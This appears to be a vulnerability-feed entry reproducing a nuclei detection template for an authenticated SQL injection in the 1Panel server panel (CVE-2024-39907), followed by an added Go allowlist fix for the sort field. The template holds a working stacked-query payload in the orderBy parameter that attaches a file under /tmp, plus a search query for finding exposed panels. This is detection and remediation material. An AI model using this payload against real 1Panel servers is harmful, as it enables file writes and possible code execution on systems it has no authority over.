nuclei | ProjectDiscovery | NUCLEI:CVE-2024-39907
Jul 30, 2024 - 9:14 a.m.

1Panel SQL Injection - Authenticated

2024-07-30 09:14:30
ProjectDiscovery
github.com
Tags: cve, cve2024, sqli, 1panel, authenticated, linux, server, management, panel, arbitrary, file, writes, rce, web-based, sql, injection, project, filtered, upgrade

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score: 7.3 (Confidence: High)
EPSS: 0.006 (Percentile: 79.5%)

1Panel is a web-based Linux server management control panel. The project contains many SQL injections, and some of them are not well filtered, leading to arbitrary file writes and ultimately to RCE. These SQL injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.

id: CVE-2024-39907

info:
  name: 1Panel SQL Injection - Authenticated
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
  reference:
    - https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-39907
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.09387
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA"
  tags: cve,cve2024,sqli,1panel,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        EntranceCode: ZW50cmFuY2U=
        Content-Type: application/json

        {"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"}

      - |
        POST /api/v1/hosts/command/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_all(body_2, "SQL logic error","table exp already exists")
          - contains(header_1, 'psession')
        condition: and
# digest: 4a0a0047304502207a2fc8ad9c41d36e76e2405dd372a3c3b1e23cdb7aae86fe21aa9395e37fc307022100a6abdb6d7d79e5715931d0216fa0a2f44d2adb4a35fe03b29b776e2fa9b2d5ae:922c64590222798bb761d5b6d8e72950
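
One way to close the injection point the template exercises (the `orderBy` field of the search request), added here as an example and not taken from 1Panel's code or its 1.10.12-tls fix: the sort column and direction are looked up in server-side allowlists, so client text never becomes part of the SQL string. The column names, `OrderClause`, `searchReq` and the sample request bodies are assumptions made for illustration.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// searchReq holds the two sort fields of the JSON body the template posts
// to /api/v1/hosts/command/search; the other fields are ignored here.
type searchReq struct {
	OrderBy string `json:"orderBy"`
	Order   string `json:"order"`
}

// Assumed sortable columns (hypothetical; not taken from the 1Panel schema).
var sortColumns = map[string]string{
	"name":       "name",
	"command":    "command",
	"created_at": "created_at",
}

// Direction keywords accepted from the client, mapped to SQL constants.
var sortDirections = map[string]string{"ascending": "ASC", "descending": "DESC"}

var errBadSort = errors.New("rejected sort parameter")

// OrderClause returns an ORDER BY fragment assembled only from server-side
// constants. Client input selects a map entry and is never concatenated.
func OrderClause(body []byte) (string, error) {
	var req searchReq
	if err := json.Unmarshal(body, &req); err != nil {
		return "", err
	}
	col, okCol := sortColumns[req.OrderBy]
	dir, okDir := sortDirections[req.Order]
	if !okCol || !okDir {
		return "", fmt.Errorf("%w: orderBy=%q order=%q", errBadSort, req.OrderBy, req.Order)
	}
	return col + " " + dir, nil
}

func main() {
	// Constructed sample bodies: an ordinary sort and a stacked-statement value.
	good := []byte(`{"page":1,"pageSize":10,"groupID":0,"orderBy":"name","order":"ascending","name":"a"}`)
	bad := []byte(`{"page":1,"pageSize":10,"groupID":0,"orderBy":"3;SELECT 1","order":"ascending","name":"a"}`)
	fmt.Println(OrderClause(good))
	fmt.Println(OrderClause(bad))
}
```

Logging the rejected value at the point where `errBadSort` is returned also gives defenders a record of probing against this endpoint.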
